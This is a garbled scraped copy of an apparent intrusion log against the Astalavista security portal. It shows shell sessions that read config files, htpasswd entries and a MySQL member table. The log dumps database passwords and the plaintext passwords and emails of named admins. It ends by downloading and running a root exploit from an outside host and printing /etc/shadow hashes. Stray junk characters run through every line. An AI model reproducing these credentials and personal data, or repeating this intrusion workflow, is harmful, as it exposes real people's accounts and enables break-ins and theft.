$ Y; }0 Q8 `0 m( b% Gdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..: w# w1 f3 h$ [; p/ r
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
' B3 n# ~! B% H) zdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
" C8 v1 J" ^, y/ [& a2 |% r1 Gdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com7 c- F6 ?* b- t" C* R
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
# H# Q1 ]6 ^ s$ g* `" T; Gdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner5 E) W5 M( M" c, p. w: a$ B1 Q+ n
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
( P4 k/ ^. B5 {) B) U0 u- Z; Sdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
2 E; ^' g# B, F! adrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
3 X9 b$ H" k0 [2 I& n. c$ bdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
& F" b3 H. k/ A; c# C, f' j-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php8 R; y2 @4 B% Z: \& R5 x8 ~
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico a2 D$ U, G/ w+ Z9 @3 {) a7 Z
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed6 h% d" L& }3 B' K9 m
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour" D D4 n \+ t" Z% s+ m b
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess- a6 b; R7 x9 @8 y9 _
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
2 Q0 t7 C1 r D c-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
1 {9 L+ `2 H3 ?: K- y% K5 V-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
* c2 E4 X; n, |1 {: E; C-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php8 Q# n4 e, T0 U6 W$ I6 k: P
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
- ?* a6 d- A3 [. U2 I-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
2 a7 U; ]! E7 B# Qdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc% E1 T z$ R C( Y( Z- i! P
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang% B2 D/ F4 [* d' p5 n* f
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
9 p% Y, u1 U5 y! W, A4 Rdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log% A& U8 [7 T& `. \1 I" R
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member4 \1 N/ W% B& z' S1 L
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata: ?+ U4 G, x* l9 x. h
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
& N9 @4 h! R8 t% L-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
* q) o& M2 F) t( ?7 Zdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
8 O2 T# ]5 }; G6 ?1 j! C1 R5 e-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
$ |' c* h' K E- H6 V) T9 V/ H1 mdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss3 _9 X1 D+ h* u( Q1 J
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
, ]$ G( W& j8 ?4 Q& m0 ^2 |drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
% x, {4 ^+ O+ p1 |/ M3 I) N; ?drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes' |* ?# j1 `( I% ~
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
2 R5 n P5 G5 S( r5 A8 {) v) mdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
$ Z: d$ d3 C) U& q, Q- A' G5 @drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
" d# L# q; y2 P& @" x0 Ldrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old8 R# E H8 [, N+ E
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php! h% X+ I$ F1 q. P/ T/ W- c
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki- {! `% B \: B0 s# S. J! L
, F/ N3 C# c& J. nsh-3.2$ head -20 index.php0 S3 o2 q3 Q$ }3 H- r6 W
<?PHP
0 n& |/ C0 V; K) |/**, V2 x# {& H. T1 \/ K% ^. x( I( n4 h
* Mainfile (external) for astalavistaNET v2.0; d' [5 g% o" x
*7 w+ C; L0 O7 M2 h: F5 Q5 k' q- }6 y
* @copyright Astalavista IT Engineering GmbH+ e4 l$ O, C a* J; V
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
9 S8 D) ?% i) V" m7 D: L* @version 1.0
. ]; R% p6 a3 w! V8 w0 B) f2 ^*/1 p; L0 k/ q( ]6 }) J: u
% R* v8 d0 Y* e6 a if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {5 e: h+ B+ G3 ^3 |& U
$dontStartSession = false;! z0 @: H/ Z& S+ e* j; H- C8 i
} else {) |9 D, B2 V6 H) L; Y
$dontStartSession = true;
U! T! X2 W! j6 B6 o. J1 |, J }4 v n# i1 C8 t' X$ y
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
% q9 A5 E$ W* ~, E0 F! a require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
; z# t% _9 W5 C/ k9 C4 H% p/ v require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);: S T! N8 d0 ~8 B# d% L; [
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);7 g5 H- g8 H; Y, K, ^' i, N
" T3 X" ]5 T" m% \, b5 G
sh-3.2$ cd config
/ ]) ^0 O+ W+ j9 }sh-3.2$ ls -la- j' O. M1 W; [% q, N
total 32
3 |, n& z1 x+ @3 w+ Q4 fdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
1 G- _2 i; S/ s9 r8 N' Gdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..4 ?* |5 P8 A6 L/ {
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php! B4 S2 I3 k s
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
1 }/ j V/ B+ v1 u6 \% s-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
% u+ O3 c- c' E/ x6 Q-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php# ^ X2 V! l1 h9 \, o! ?! K2 |
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
. C/ a+ V% w3 E" D" a% _1 k- F$ H) |) c: y7 D) S+ I
sh-3.2$ cat com.conf.php) @5 U, |( `: F. p" R! T9 Z
[snip]
" i# Y6 ^/ Y5 F v4 N: A4 W( Q7 I//member-database
1 t# |4 c$ r# \; R$ L$_CONFIG['db_mem_server'] = ‘localhost’;
9 `( B9 r% y4 S8 e8 P1 L( B$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;+ |5 T2 r) G. `' ~6 k
$_CONFIG['db_mem_user'] = ‘astanet_db’;
$ _9 _3 r7 m0 n2 ^ V$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’; c. w7 \+ F0 }, n; c# I7 x
$_CONFIG['db_mem_debug'] = false; //true or false
; j; a# Z+ r7 x4 E+ T8 R//ads-database* c A% H( x+ v8 E* l
$_CONFIG['db_ads_server'] = ‘localhost’;6 l+ w( t& R3 x5 L
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
7 u: K0 A% Y2 W7 ]; R$_CONFIG['db_ads_user'] = ‘astanet_db’;
( `3 g: d: `* C9 B$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
* n6 e. w4 M5 G ?! X5 H& Z) B" w$_CONFIG['db_ads_debug'] = false; //true or false* }. Y( z3 ~4 Q0 k
//rainbow-database7 U2 }8 |) E3 i. Z( I, g& S
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
; ?' f0 O+ \/ F$_CONFIG['db_rainbow_database'] = ‘rainbow’;
0 e8 F- [/ l* W: [ r5 S$_CONFIG['db_rainbow_user'] = ‘dinu’;6 U( j' S4 F" X8 g
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;" ^2 Z# Q/ M' i, z
$_CONFIG['db_rainbow_debug'] = false; //true or false
' `% a$ C {4 F0 {* I//mailing lists database8 ]; R" R. L7 L+ j, O; S
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
: h9 B$ y r1 x+ w- \. V& Z5 a$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;3 r6 @- y$ [5 o: Z1 R
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
; y) F/ |7 @+ a4 f# w$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;" V9 e' N) ~. {5 C% {# q, J
$_CONFIG['db_mailing_lists_debug'] = false; //true or false2 @, S$ w9 h' D! [ Q
//paypal/ d7 d7 v7 m& O; C
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;6 E" l7 W. X& h
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
7 p. C. B" Z. R+ o) v {$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
K% N# p/ W3 n2 u$_CONFIG['sub_pp_noship'] = ‘1′;
+ t9 s& W* o( t! l) m* @$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;7 e% B' a' q3 F% m* c0 k5 C) _( V
[snip]
7 P8 h' m1 S3 |& n: g3 K2 s# f) i0 V6 k% a' N5 _
sh-3.2$ cd ..
) }- W5 M: s# `6 ]+ O6 ksh-3.2$ cd member
' `) O" [1 Y; x Zsh-3.2$ ls -la
/ B% s% x6 b" @0 Q& U. }" Etotal 20# F, R# N( E# g8 z+ \
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
1 F; f/ d# l0 m. L# Qdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
" D" k7 Y: M4 `/ e) ^! K& S-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess5 V' G9 l& O$ L! M6 @
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php' @% y3 A" x8 b/ n
sh-3.2$ cat .htaccess) h+ c1 q2 m5 F3 M4 [% f7 T/ r
SecFilterEngine off
& }& G& D" P ^6 z$ }* C
w4 P5 @1 M/ I+ v2 Zsh-3.2$ cd ..4 w2 v% |5 _/ V& F4 k+ k
sh-3.2$ cd cron( x9 t" P' S% F2 d8 j
sh-3.2$ ls -la- A1 j+ P( M* ^8 t
total 168
# w3 D6 p7 z" [8 c# K: k$ c8 l, Adrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
0 q6 |, ]( z. \! H) k$ Q- O, Fdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., n* r: P- |( I( j! L- Z
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php- U8 E( G% b7 P# ?9 `) A4 G
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php6 \$ y3 e% u/ i, p6 H# J) t
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
* ]# r6 ?0 h2 P; u, X1 r: H2 A9 _-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php% x5 \9 E E7 Y: r7 e! p/ o
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
7 i2 g7 T, C6 ]7 Z1 \-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
9 i/ M/ O9 Q; ] s5 i. i-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
3 d* W2 V- p7 O6 e6 U- X0 v8 F, a-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
6 s c" u, k. G) h# D4 Y3 V-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
% Y- Y _! l4 C. j' d3 N-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
3 {7 k/ b1 g1 |4 f: [# X$ e-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php: \+ @) p3 Q" h) l2 _7 C9 n
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
* b/ i+ V* J8 U5 C-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh5 r, e9 b- n( w) J$ u
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php2 p- H# n5 n: _- A0 ]1 O! A' [ s
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
! s) O% U5 s# N9 h$ W-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php" W L: }; ~. N3 Z5 _' Q6 M
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php1 k4 e0 S* q- A* }
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php7 b0 C: I1 A2 P9 L/ r3 t$ h O
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
! G# D" @* Z9 ?% g9 r-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
4 v% G. v4 h$ _" U, R' B-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
- a: [: Y3 f( k* T" i3 S
: ?0 u- J4 T5 Q O* f \9 [ wsh-3.2$ cd ..
$ ~# K. n! v. | E Qsh-3.2$ cd _0076 j9 T7 s4 G8 v; x
sh-3.2$ ls -la
, S7 c4 b f5 H! }. k+ t& qtotal 24- g u- s1 `$ J. i' V% O
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .' t! |/ A, J0 w( O
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..4 i$ v2 [9 i, l% k- u% x9 A
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess4 g" a1 z; P6 V5 D
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php. o8 Q% x; U% q& k+ u* A% T
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
/ p: E0 Q- s* s4 i( W. M) e* E" ]6 Rdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
, y$ j) o3 J$ ~2 f) R4 P9 I: L- z5 X% k9 H9 N
sh-3.2$ cat .htaccess
% C* V! g1 t. H8 [$ bauthType Basic
2 a4 G' o: X8 L: VauthName Admin! U' H: W/ E; M# [7 M
authUserFile /home/astanet/auth/.htadm_pwd: I! o& v+ b& v; s9 L- I& M
require valid-user/ ]* N+ }1 S% C. |. L* p7 v. n
& w# Q7 J0 q0 Q5 g: k; vsh-3.2$ cat /home/astanet/auth/.htadm_pwd$ u6 |8 @" i( e7 P: d1 f
admin2net:CR0bl65MwhfT6 ]; Z6 u6 ]3 D ~9 J& H+ ?
: O; y4 K9 `( x5 W; g0 nsh-3.2$ mysql -u astanet_db -p+ Z j* G2 d# d% a4 l! S
Enter password:
: a. h+ r( w4 O: Z* {, R% JWelcome to the MySQL monitor. Commands end with ; or \g.
4 f7 `2 p. d8 o, ?+ p6 G% BYour MySQL connection id is 275153* ]& i) v5 f" F8 Z
Server version: 5.0.45-community-log MySQL Community Edition (GPL)+ e: L ~! B2 t3 k1 V8 Z# ~" k+ [
( [1 D# B8 G0 _1 R. IType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
0 M( Z b" @1 x1 o* C9 U1 Y
% m* P: }! m" n! Omysql> show databases;
, z! v) |8 o2 o3 s# x+———————–+: ?, Y# g' [0 }& N$ X: i0 m
| Database |7 D# O |0 @3 [* c5 C
+———————–+
' T* A, F- g) w- k2 h% l| information_schema |3 X% d& Y! H* e. F& ^- q
| astanet_ads |2 h2 M, T- ~, ]! f8 }
| astanet_mailing_lists |$ v* | J* n: c% k* e& n2 q
| astanet_mediawiki |
0 ?8 m' i( |: R8 y- ^| astanet_membersystem |7 y) J$ O* B/ ^0 A. J8 C
| test |
5 y4 m, I( R; Z9 X+———————–+* \. m, u4 Z( @+ W" Z1 N
6 rows in set (0.00 sec). J f$ f& d4 h- i& G) T
* v. Y$ ~* v* I5 gmysql> use astanet_membersystem: t1 c8 U. m6 F6 @5 U
Database changed" ?! G4 t7 ]6 G3 x: a5 X( _
mysql> show tables;
, t; [0 M V/ T0 v+———————————–+
/ R# l1 {4 T* t| Tables_in_astanet_membersystem |
+ t. E- e) I2 }+ i+———————————–+$ `: Z" ?) n7 t- Q8 w/ n- q
| blacklist_categories |
% R# Q w/ {) T$ e( @, Q9 E| blacklist_content |
( r1 Z) U1 Y$ t/ V; M- X$ s$ ~0 L| blacklist_levels |
7 b @. E3 s# |7 o| blacklist_mcset |
; p9 R" d) w$ B) W$ M8 n' D8 a| dir_categories |
1 Y" H# k& ?1 h3 b2 e0 ]7 z| dir_comments |
6 E3 D" e' y5 v1 [% J& u| dir_links |1 [# E3 d/ d' N, [; x+ F/ v
| dir_temp |
9 O# J& c5 z( {9 ^. {| dir_votes |- r3 d9 Z1 w6 `- M9 N/ T
| documents |) ? c/ ]! G1 A# B" o5 Q
| documents_categories |3 Y7 U; r- g7 I1 `: [3 K" Q
| email_content |0 ?9 w `& [0 _ r" y2 z# [% J
| email_settings |
& L# |% t) b1 Y4 S| exploits |! a* K6 @1 }" @- R3 ?1 J2 `5 a' S
| exploits_categories |) I. k& z$ |) r% l
| exploittree_categories |7 t4 b% g3 z f. ]
| exploittree_exploits |" ^0 f4 E* O" q& q
| home_values |, C6 n- f* w5 }6 `1 E0 y* ]' Q. r
| iso_countries |; G/ v9 J& p! M& e/ u% {2 J
| links_categories |
9 n" t3 ?2 V& \3 j/ |8 _% K| links_records |
3 |. t# k: c: i7 i| links_unauth |& s+ Q3 q X4 ]6 |4 x+ \
| links_votes |) A' w% L, v) ?' F
| log |
; x% T; O6 y1 i+ C) h/ a| news_categories |$ E4 Y T5 S! X
| news_comments |
0 u3 P3 V# g- g| news_emoticons |
9 j+ J; j/ o9 N- f| news_latest |
* z+ P' n9 R$ `| news_messages |
+ @3 P7 B! l# Q/ v& V| news_statistics |
7 Z& T- j9 N3 ^$ j| news_votes |
5 s& x- C4 f' x3 F2 K& j! j| prices_content |
+ o+ Q2 W5 y6 H; l% n+ `5 `( m| prices_offers |
4 ]+ B4 f& E l6 R% f3 L; ]| rss_settings |+ J, T. }' K5 G2 l: F7 x
| sessions |/ L; w' L8 E$ N* g
| stats_signups |
' V0 O3 E+ ~+ a4 [9 G* s| u2u2 |
: Z) R8 ~6 C4 {; _| u2u_contact |6 K' ]: ?3 W2 ~1 Z4 A( T4 R
| u2u_settings |# K, _& f' @1 b) g
| user_keywords_selected_categories |
" M8 _+ D7 A+ [+ [3 f3 l4 X| users | `/ q. T. b7 F& O: z4 `; {9 Z
| users_ipn_test |
" X$ O7 E; I( k6 H| users_keyword_values |1 N1 o4 K \( \/ P4 V$ Q
| users_profile |
6 h$ a/ I0 a" m% Z| users_temp |
$ H7 `0 K* S( S. x| users_upgrade |2 I0 `2 S6 ~' L" Q- \5 @) \4 D
+———————————–+( l* ` T# Z) @9 I8 H, L3 R& B+ t9 R
46 rows in set (0.00 sec)$ {/ l) k9 ]% a4 C
# g# }; e7 m6 \' g2 A
mysql> describe users;" r% C) Q- Y1 O! s
+————————–+————————————–+——+—–+———————+—————-+
' x4 F4 b7 ^! b( b7 s2 || Field | Type | Null | Key | Default | Extra |
+ A" ~) w5 P1 s1 k+————————–+————————————–+——+—–+———————+—————-+2 I! k2 @" h9 q$ n, R0 d
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |* S" q/ ~ p- E: i. b
| user | varchar(50) | NO | | | |2 F) ]# C" K3 B3 V, i9 P1 ]
| nickname | varchar(30) | NO | MUL | anonymous | |
( P; c3 W; b: n0 n% I; o| password | varchar(30) | NO | | | |' ] x! p$ w6 N( a `* ?
| userlevel | tinyint(3) | YES | MUL | NULL | |# ] L2 M: i( M+ U. s9 e8 H
| exp | int(8) unsigned | NO | | 0 | |
7 o& Z) S' U" R9 n' k| email | varchar(50) | NO | | | |% b& C7 h' w9 p6 K
| ip | varchar(15) | NO | | 0 | |
; _ ` P" { Q5 l$ i: Z% F3 G- k5 m| proxy | set(’0′,’1′) | NO | | 0 | |
' y/ C& g7 w' o' f$ @; R| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
' H! ?) @+ d" u. M- A| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |: t1 ]2 T* l& ^+ v) o
| anz_in | tinyint(1) | NO | | -1 | |
. S$ n/ v1 J# J& l" j; H| status | tinyint(1) unsigned | NO | | 0 | |
9 x8 r2 O6 E! Z0 ~' d! _| checked | set(’0′,’1′,’2′) | NO | | 0 | |
, i6 ?5 ~# s% ~; m' i* ^| freemember | set(’0′,’1′) | NO | | 0 | |
6 w4 j4 p( c& r6 r9 m| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
9 r3 d5 u+ i3 y% D: A0 v M) B c| lang | tinytext | NO | | | |
7 b( u, {4 c( ~" L3 P* v| adid | smallint(6) | NO | | 0 | |
; v8 r" q& Y; c f) ?) T3 [| pp_txn_id | varchar(255) | YES | | NULL | |! n4 }4 H& s- N" {9 t
| cnb_transaction_id | varchar(255) | YES | | NULL | |
! o# x7 v) d: J| cnb_order_id | varchar(255) | YES | | NULL | |" N% b7 t4 p! M2 j$ ] R
| cnb_user_id | int(11) | YES | | 0 | |
) a" J6 F" m. ]3 b4 B* T+————————–+————————————–+——+—–+———————+—————-+: F& B( ]. h3 e, k8 Y$ b0 Q' b1 m" @
22 rows in set (0.01 sec)
1 n. R7 V5 v" a8 w
, }0 u; u2 P$ G6 ]1 Y! G4 smysql> select count(*) as skids from users;. C# b3 b" f7 T+ z8 x$ g
+——-+0 k5 \, i# y( T
| skids |
0 P; U; j7 v* n9 T3 s! q+——-+
( @7 n+ v" ~0 y4 O5 n; b2 a| 25199 |
( h1 h8 M3 C6 ~! U; q+——-+
5 K1 s- V/ L/ b3 c1 O1 row in set (0.00 sec)
; _: b# ~& l4 r5 C, b( Z7 U9 V4 y) T: h- f
mysql> select user,nickname,password,email from users where userlevel = 1;6 w. s& ^) k4 V2 n) B. y$ x
+————————–+———————-+——————+———————————–+
5 l* u* {$ [' e, C| user | nickname | password | email |
3 K; W; w; Y1 e. [$ b F+————————–+———————-+——————+———————————–+
% S- U3 z: h& L5 a| pascal | prozac | astaman3 | 链接标记info@astalavista.net |( Q2 ]( d- ~* y: A8 H
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
' l# o& ?- z$ {7 } v| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |8 W1 R5 a# t `" ?
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
9 O" F# c0 u6 M5 h& h8 e( Y| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
1 r0 U1 X* ?- j! z) P l) o; }. K/ G+ v| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |, j/ H. i* Z; H
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
: N: }6 [$ L+ e- j6 R9 R7 `| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |" S+ r8 Z/ T- i0 \! h# b; T
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
1 e/ I) L( P5 @, d& }& H| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
6 e" r% U0 p% Q0 O- ? x/ M$ n| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |) e9 i* S) h: [) ?
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |& T5 g0 V8 W9 O) `
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
1 y/ d; V8 d* Q5 ^1 x$ D: b( d| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |$ L# `8 F( h4 M" j8 X
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com | ] L B1 i/ [- h! u' d) ~, T' u
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
- m7 G& l# T% {% o| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |+ i4 n/ t+ m2 A
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |3 _" E( ~9 D. P7 ~
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
6 f7 E7 M7 z$ H& k| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |0 |* t) y7 u1 g4 m, S, O
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |/ @" J4 ]+ l% E
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
) P2 K- K" f% `5 m1 w, q2 E| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
5 X9 @. ~0 u/ \$ I0 ?| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
3 } R( O1 `# c3 N. d+ ]7 y| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |7 M0 M! B$ y7 l; Q
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
0 L& E* u) W* |0 \| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
. t" v ], j; W2 Z# r7 U' ]. W+————————–+———————-+——————+———————————–+9 G. c2 s: a8 j" v Q0 L+ z
27 rows in set (0.00 sec)
0 R3 P; `4 E/ v! Y
4 M7 S' I9 t: C2 t7 ]2 e# Umysql> exit;
, `/ i. `9 Q y3 V) IBye
( T" n% |! S+ r. e8 [- r7 y) Z2 C3 z7 A2 s
[~] plaintext passwords? yes,0 d& [# @' s ]2 r; _& ?7 y1 C
Those so called “security professionals” who charge you $6.66 / month to! z$ W% A5 e. k/ Y7 q
register at their hack-proof portal, save your passwords in plaintext…, _% u" f5 @& W2 v
brilliant!6 @+ o# ]. x9 ~( h, O, T) w' k
( J; P5 U: r, H5 I# U/ r2 M[~] This been fun but we want more.1 s5 I8 W. {/ A8 W
2 h2 K, l# A1 O' @: x
sh-3.2$ uname -a0 i; {$ S3 Z2 q+ s
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
" { y* t# N$ f( g" rsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]' |/ p- y. m' n: I, l2 Z: Z
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]! \9 Q7 t S* m+ c
Resolving anti.sec.labs… 13.33.33.372 b$ [2 v4 T: W s9 g& u, ?6 G
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
. Z w+ j+ N7 T! x: GHTTP request sent, awaiting response… 200 OK2 _& u1 W" A' w% K# B9 z
Length: 18200 (18K) [text/plain]+ ~1 W8 ~1 @" D+ B2 u0 K
Saving to: `g0troot’
0 O/ b+ [0 o$ Q; Y3 K- P% q7 V* V3 R+ ^/ H9 J6 f8 i( M
100%[=========================================================================================================================================>] 18,200 58.6K/s in
7 d' S% W O' H/ R0.3s, r) y" k2 S5 D) [0 c: ]
( O6 k' S, ?2 x7 y18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]" X& P# m' p) K1 e5 }
4 Y. |( C. m8 Y8 ?6 V+ Ssh-3.2$ ./g0troot -i x86_64. N! X, n' W( s3 l5 r& Q/ k% r' M
[+] g0troot - anti.sec.labs S5 Q3 G6 L* H
[+] Target: 2.6.18-128.1.10.el5' C2 i# |6 M0 x I
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
6 t- |2 S' d/ o! l7 [+ x+ T; m: M8 h* s
[+] r00tr00t' R& ~3 G- u( ^- b5 n0 V
[~] Executing shell… `2 u# s- o+ K7 U' C
! U+ {) P. }/ C, psh-3.2# id
# J0 o4 M" W. N4 U4 V0 Uuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel): u/ }8 O' ~, l$ }4 a
6 @+ V3 B7 ^' b1 fsh-3.2# cat /etc/shadow
& U' U$ _8 x+ l+ [2 N" yroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::% |: g5 v- B w) ^6 r1 }' ^. S) H
[snip]
+ m$ E, }# e( ~' Kadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
4 o6 M2 O; }8 j+ ~6 ?jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
